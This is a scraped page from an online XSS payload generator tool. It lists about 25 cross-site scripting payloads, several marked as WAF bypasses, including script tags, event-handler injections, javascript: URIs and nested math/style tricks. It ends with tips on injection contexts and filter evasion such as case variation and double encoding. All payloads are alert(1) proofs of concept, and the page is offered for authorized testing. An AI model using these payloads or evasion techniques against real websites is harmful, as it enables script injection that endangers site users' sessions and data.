Interactive Tool
XSS Payload Generator
Generate context-aware Cross-Site Scripting (XSS) payloads. Select your injection point, apply encodings to bypass filters, and get instant results.
For authorized security testing only. Unauthorized use is illegal.
🎯 Injection Context
Between tags
🔒 Encoding
Custom JavaScript
8 chars
⚡ Generated Payloads25 results
<script>alert(1)</script>WAF Bypass
<ScRiPt>alert(1)</ScRiPt>WAF Bypass
<scr�ipt>alert(1)</script><img src=x onerror=alert(1)>WAF Bypass
<img src=x ONERROR=alert(1)>WAF Bypass
<IMG src=x onerror=alert(1)><svg onload=alert(1)><body onload=alert(1)><iframe src="javascript:alert(1)">WAF Bypass
<iframe src="javascr�ipt:alert(1)"><marquee onstart=alert(1)><video><source onerror=alert(1)>WAF Bypass
<video><source ONERROR=alert(1)><details open ontoggle=alert(1)><math><mtext><table><mglyph><style><img src=x onerror=alert(1)>WAF Bypass
<math><mtext><table><mglyph><style><img src=x ONERROR=alert(1)>WAF Bypass
<math><mtext><table><mglyph><style><IMG src=x onerror=alert(1)><input onfocus=alert(1) autofocus><select onfocus=alert(1) autofocus><textarea onfocus=alert(1) autofocus><keygen onfocus=alert(1) autofocus><audio src=x onerror=alert(1)>WAF Bypass
<audio src=x ONERROR=alert(1)><object data="javascript:alert(1)">WAF Bypass
<object data="javascr�ipt:alert(1)">Quick Reference
Context Tips
- HTML Body: Standard injection between tags.
<script>works here. - Attribute: Inside tag attributes like
value="...". You often need to break out with">. - JavaScript: Inside existing
<script>blocks. You need to terminate the current statement. - URL: In
hreforsrcattributes.javascript:protocol is key here.
Bypass Techniques
- Case Variation:
<ScRiPt>can bypass simple regex filters. - HTML Entities:
"becomes". Browsers decode this in attributes. - URL Encoding: Useful when input is reflected in a URL parameter.
- Double Encoding: Can bypass WAFs that decode only once.